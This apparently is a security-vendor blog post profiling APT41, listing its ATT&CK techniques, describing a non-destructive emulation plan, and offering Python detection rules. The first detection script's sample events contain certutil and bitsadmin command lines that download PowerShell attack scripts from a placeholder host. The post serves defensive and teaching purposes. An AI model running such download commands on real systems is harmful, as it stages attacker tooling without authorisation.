Welcome to another week of #ThreatThursday. This week we leverage an adversary emulation plan created and shared to the community by a third party: APT41 Emulation Plan. As usual, we will cover Cyber Threat Intelligence, create a threat actor profile, create an adversary emulation plan from the work done by Huy, share the plan in our Github, explain some of the new TTPs we will leverage, and discuss how to defend against APT41. We hope you enjoy.
Cyber Threat Intelligence
APT41 is a Chinese actor first seen active in 2012 and has been observed in a broad-ranging campaign through 2020. Its intent has been both state-sponsored espionage and financial gain. After exploitation, APT41 leverages sophisticated TTPs and deploys additional payloads through several different methods, such as bitsadmin and certutil. It also looks to evade defenses and establish persistence, making it an incredibly dangerous threat.
Cyber Threat Intelligence Sources:
Many of these TTPs have been discussed in previous #ThreatThursdays, so we want to focus on some new ones. In the adversary emulation section we will discuss:
- Execution Guardrails - restricting the payload to only execute within a particular domain environment
- Bitsadmin - to download a payload
- Certutil - to download a payload
- PowerView.ps1 - PowerShell script to gain situational awareness on a domain
Adversary Emulation Plan
After reviewing the Cyber Threat Intelligence reports and MITRE ATT&CK mapping, we organized the TTPs by Tactic and created a threat profile for APT41:
Initial Access
T1190 - Exploit Public-Facing Application
T1566 - Phishing
T1566.001 - Spearphishing Attachment
T1195 - Supply Chain Compromise
T1195.002 - Compromise Software Supply Chain
Command and Control
T1071 - Application Layer Protocol
T1071.004 - DNS
T1071.002 - File Transfer Protocols
T1071.001 - Web Protocols
T1568 - Dynamic Resolution
T1568.002 - Domain Generation Algorithms
T1008 - Fallback Channels
T1105 - Ingress Tool Transfer
T1104 - Multi-Stage Channels
T1090 - Proxy
T1102 - Web Service
T1102.001 - Dead Drop Resolver
Collection
T1560 - Archive Collected Data
T1560.001 - Archive via Utility
T1056 - Input Capture
T1056.001 - Keylogging
Execution
T1059 - Command and Scripting Interpreter
T1059.001 - PowerShell
T1059.003 - Windows Command Shell
T1059.004 - Unix Shell
T1203 - Exploitation for Client Execution
T1053 - Scheduled Task/Job
T1053.005 - Scheduled Task
T1569 - System Services
T1569.002 - Service Execution
T1047 - Windows Management Instrumentation
Defense Evasion
T1197 - BITS Jobs
T1480 - Execution Guardrails
T1480.001 - Environmental Keying
T1070 - Indicator Removal on Host
T1070.001 - Clear Windows Event Logs
T1070.003 - Clear Command History
T1070.004 - File Deletion
T1036 - Masquerading
T1036.005 - Match Legitimate Name or Location
T1112 - Modify Registry
T1027 - Obfuscated Files or Information
T1542 - Pre-OS Boot
T1055 - Process Injection
T1014 - Rootkit
T1218 - Signed Binary Proxy Execution
T1218.001 - Compiled HTML File
T1553 - Subvert Trust Controls
T1553.002 - Code Signing
T1078 - Valid Accounts
Credential Access
T1110 - Brute Force
T1110.002 - Password Cracking
T1003 - OS Credential Dumping
T1003.001 - LSASS Memory
Persistence
T1547 - Boot or Logon Autostart Execution
T1547.001 - Registry Run Keys / Startup Folder
T1136 - Create Account
T1136.001 - Local Account
T1543 - Create or Modify System Process
T1543.003 - Windows Service
T1133 - External Remote Services
T1574 - Hijack Execution Flow
T1574.002 - DLL Side-Loading
T1542.003 - Bootkit
Discovery
T1083 - File and Directory Discovery
T1046 - Network Service Scanning
T1135 - Network Share Discovery
T1016 - System Network Configuration Discovery
T1049 - System Network Connections Discovery
T1033 - System Owner/User Discovery
Privilege Escalation
T1546 - Event Triggered Execution
T1546.008 - Accessibility Features
Lateral Movement
T1021 - Remote Services
T1021.001 - Remote Desktop Protocol
Impact
T1486 - Data Encrypted for Impact
T1496 - Resource Hijacking
As usual, we created and shared the APT41 adversary emulation plan on our Github in both ATT&CK Navigator JSON and SCYTHE Threat JSON. In this emulation plan, we broke the threat down into different steps: discovery, execution, defense evasion, persistence, credential access, and clean up. We also added threat automation language to check whether the payload is running with high integrity (administrative privilege). If it is, the plan performs additional steps that are skipped when it is running without privilege.
APT41 leverages the well-known PowerShell script for host, network, and domain situational awareness (also known as reconnaissance or discovery) called PowerView.ps1. There are multiple ways to download and execute this script in memory, but in this case we are going to download the script to disk and then call it to run various cmdlets it provides:
Defense Evasion with bitsadmin and certutil
APT41 uses two well-known living-off-the-land binaries and scripts (LOLBAS). These are binaries signed by Microsoft that ship with the operating system and have some added functionality beyond their documented purpose. In the adversary emulation plan, we use bitsadmin and certutil to download two well-known PowerShell scripts for Kerberoasting and domain enumeration.
To maintain our non-destructive philosophy of emulation, we showed the ability to download example payloads and execute PowerShell commands without necessarily running anything malicious. To show a proof of concept for persistence, we chose to add example registry keys, services, and tasks so that they would be easily distinguishable and removable.
All of the above steps for persistence may be done by a user with limited privileges. We have added a check to the adversary emulation plan to determine the integrity of the process; if it is a high-integrity process, the plan then performs other persistence and credential access TTPs that require administrative privileges:
After all the automation for APT41 is run, there are cleanup steps to remove the proof of concept persistence methods created by earlier actions.
Defend against APT41
While APT41 has quite the span of discovery, persistence, and evasion techniques, it also has a few specific key areas that can inform a security team on how to defend against it.
Additional Payload Download
APT41 has a few methods of downloading additional payloads: PowerShell, certutil, and bitsadmin. These are known as living-off-the-land binaries and scripts: binaries signed by Microsoft that ship with the operating system. Preventing their execution is very difficult, so it is best to enable detection and alerting controls for when they are used to access external resources.
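As an added illustration of that detection control (example code written for this post, not part of the SCYTHE plan or any product), the following rule scans process-creation events and flags certutil, bitsadmin or PowerShell when the command line carries a URL outside an assumed internal domain (`corp.example.com`); the events and hostnames are constructed samples, not real telemetry.

```python
import re
from urllib.parse import urlparse

# Constructed process-creation events in a simplified Sysmon/4688-like shape (not real telemetry).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -urlcache -split -f http://files.example.net/PowerView.ps1 PowerView.ps1"},
    {"image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": "bitsadmin /transfer job /download https://files.example.net/k.ps1 C:\\Users\\Public\\k.ps1"},
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -hashfile C:\\Temp\\installer.msi SHA256"},          # benign local use
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -File C:\\Scripts\\backup.ps1"},                   # benign local use
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c \"Invoke-WebRequest http://repo.corp.example.com/tool.ps1 -OutFile t.ps1\""},
]

LOLBINS = {"certutil.exe", "bitsadmin.exe", "powershell.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# Assumed internal domain; anything outside it is treated as an external resource.
INTERNAL_SUFFIXES = ("corp.example.com",)


def is_external(url: str) -> bool:
    host = (urlparse(url).hostname or "").lower()
    return not host.endswith(INTERNAL_SUFFIXES)


def flag_event(event: dict):
    """Return a finding when a LOLBin is invoked with an external URL, else None."""
    binary = event["image"].rsplit("\\", 1)[-1].lower()
    if binary not in LOLBINS:
        return None
    external = [u for u in URL_RE.findall(event["cmdline"]) if is_external(u)]
    if not external:
        return None
    return {"binary": binary, "urls": external}


def scan(events):
    """Apply flag_event to every event and keep only the findings."""
    return [f for f in (flag_event(e) for e in events) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"ALERT {finding['binary']} fetched {finding['urls']}")
```

Only the two downloads from files.example.net are raised; the hash check, the local script and the fetch from the internal repository stay quiet, which is the trade-off the text describes: detect external access rather than block the binaries.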
Public PowerShell Scripts
APT41 has been observed to use various publicly available PowerShell scripts by downloading them onto the endpoint and then executing them. In this adversary emulation plan we download the following to disk:
In this case, we did not modify the scripts, so creating a detection for the exact script known to be used by malicious actors may be an easy and effective way to detect this activity. There are many ways around it, but this detection is a start.
An alarming method APT41 uses to establish persistence on a victim is creating a new user. Defending against this would require a group policy that disallows users from creating other users. Another persistence method that is even more specific to APT41 is the creation of a service called “StorSyncSvc”. Detecting this service creation immediately (if the malware had somehow elevated privileges) would help defend against it.
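To make those two detections concrete, here is an added example (written for this post, not SCYTHE's own tooling) that triages simplified Windows event records: System 7045 (new service installed) is matched against the “StorSyncSvc” name from the text, and Security 4720 (user account created) is matched against an assumed allowlist of operators permitted to create accounts. The event records, hostnames and the `helpdesk-admin` allowlist are constructed assumptions.

```python
# Constructed Windows event records in a flattened dict form (not real telemetry).
SAMPLE_EVENTS = [
    {"event_id": 7045, "channel": "System", "host": "WS01",
     "service_name": "StorSyncSvc", "image_path": r"C:\Windows\Temp\storsync.exe"},
    {"event_id": 7045, "channel": "System", "host": "WS02",
     "service_name": "UpdateHelper", "image_path": r"C:\Users\Public\helper.exe"},
    {"event_id": 7045, "channel": "System", "host": "WS02",
     "service_name": "WinDefend", "image_path": r"C:\Program Files\Windows Defender\MsMpEng.exe"},
    {"event_id": 4720, "channel": "Security", "host": "WS01",
     "subject_user": "jsmith", "target_user": "support2"},
    {"event_id": 4720, "channel": "Security", "host": "DC01",
     "subject_user": "helpdesk-admin", "target_user": "new.hire"},
]

# Service name called out in the APT41 reporting above (compared case-insensitively).
KNOWN_APT41_SERVICES = {"storsyncsvc"}
# Directories a limited user can write to; a service binary there is suspicious on its own.
USER_WRITABLE_DIRS = ("\\windows\\temp\\", "\\users\\", "\\programdata\\")
# Assumed allowlist of accounts that are permitted to create users.
APPROVED_ACCOUNT_CREATORS = {"helpdesk-admin"}


def classify(ev: dict):
    """Return (severity, reason) for an event worth alerting on, else None."""
    if ev["event_id"] == 7045:
        if ev["service_name"].lower() in KNOWN_APT41_SERVICES:
            return ("high", f"service '{ev['service_name']}' matches APT41 indicator")
        if any(d in ev["image_path"].lower() for d in USER_WRITABLE_DIRS):
            return ("medium", f"service '{ev['service_name']}' installed from user-writable path")
        return None
    if ev["event_id"] == 4720:
        if ev["subject_user"].lower() not in APPROVED_ACCOUNT_CREATORS:
            return ("high", f"account '{ev['target_user']}' created by unapproved '{ev['subject_user']}'")
        return ("info", f"account '{ev['target_user']}' created by approved operator")
    return None


def triage(events):
    """Return (host, severity, reason) tuples for every event classify() flags."""
    findings = []
    for ev in events:
        result = classify(ev)
        if result:
            findings.append((ev["host"], *result))
    return findings


if __name__ == "__main__":
    for host, severity, reason in triage(SAMPLE_EVENTS):
        print(f"[{severity.upper():6}] {host}: {reason}")
```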
While APT41 is quite the sophisticated actor, we can still ingest the Cyber Threat Intelligence, map it to MITRE ATT&CK, and create an adversary emulation plan that covers much of the behavior of the threat. More importantly, this emulation can aid in developing methods of preventing and detecting this threat through its specific and unique behaviors. We hope you enjoyed this edition of #ThreatThursday.
This Threat Thursday post discusses active research by SCYTHE and other cited third parties into an ongoing threat. The information in this post should be considered preliminary and may be updated as research continues. This information is provided “as-is” without any warranty or condition of any kind, either express or implied.